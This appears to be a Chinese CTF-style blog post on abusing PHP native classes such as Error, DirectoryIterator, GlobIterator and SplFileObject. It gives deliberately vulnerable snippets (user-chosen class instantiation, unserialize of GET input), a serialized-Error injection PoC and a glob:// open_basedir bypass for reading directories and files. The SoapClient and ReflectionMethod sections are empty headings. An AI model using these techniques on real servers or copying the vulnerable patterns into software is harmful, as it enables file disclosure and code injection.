本文最后更新于:1 年前
PHP原生类
异常原生类
error:(PHP7,8)
Exception:(PHP5,7,8)
1 2 3 4 5 6 7 8 9 10
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new Error($dir);
echo $a; }
|
data:image/s3,"s3://crabby-images/853a4/853a4fb583162581098f9d953086e481fbcbbe40" alt=""
那,既然这样,那我有个大胆的想法。。
1 2 3 4 5 6 7 8 9 10 11
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir']; $class = $_GET['class'];
$a = new $class($dir);
echo $a; }
|
data:image/s3,"s3://crabby-images/ffdbb/ffdbb1b500f1fabfc28b8bc00544c24229b3b39b" alt=""
当然通常环境下,开发者通常也不会在程序内留下可控的创建新类对象,可能会有以下的情况:
1 2 3 4 5 6 7 8
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir']; $a = unserialize($dir); echo $a; }
|
这时候我们编写poc:
1 2 3 4 5 6
| <?php $a = new Error("<?php phpinfo();?>"); $b = serialize($a); echo urlencode($b);
|
data:image/s3,"s3://crabby-images/f9f32/f9f32dcf5b27624b67e4055dbdcfeb637517a495" alt=""
原生类读取目录:
DirectoryIterator:(PHP5,7,8)
读取目录下单个文件(目录)名,若需要全部打印出来要循环
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new FilesystemIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
data:image/s3,"s3://crabby-images/1a6f4/1a6f40e0355496272d3619de31945451c821e708" alt=""
FilesystemIterator:(PHP 5>=5.3,7,8,DirectoryIterator的子类)
DirectoryIterator
和FilesystemIterator
均有一个__toString()
方法,将获取的结果转为字符串
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new DirectoryIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
data:image/s3,"s3://crabby-images/64fc2/64fc204c95037bdf5b6f903fb86b716be39fb9e5" alt=""
结合glob://伪协议可绕过open_basedir的限制:
data:image/s3,"s3://crabby-images/57959/57959393a85201788c5503059eeca5a3097365f3" alt=""
GlobIterator:(PHP 5>=5.3,7,8)
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new GlobIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
data:image/s3,"s3://crabby-images/8bf10/8bf102f52f412fb3c0b5e2680fca407d9a014986" alt=""
读取文件:
SplFileObject:
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new SplFileObject($dir);
foreach($a as $f){ echo($f); } }
|
data:image/s3,"s3://crabby-images/9a0b4/9a0b447cb3df5116cd881a6f4a05dd6c7c1536f5" alt=""
SoapClient:
ReflectionMethod: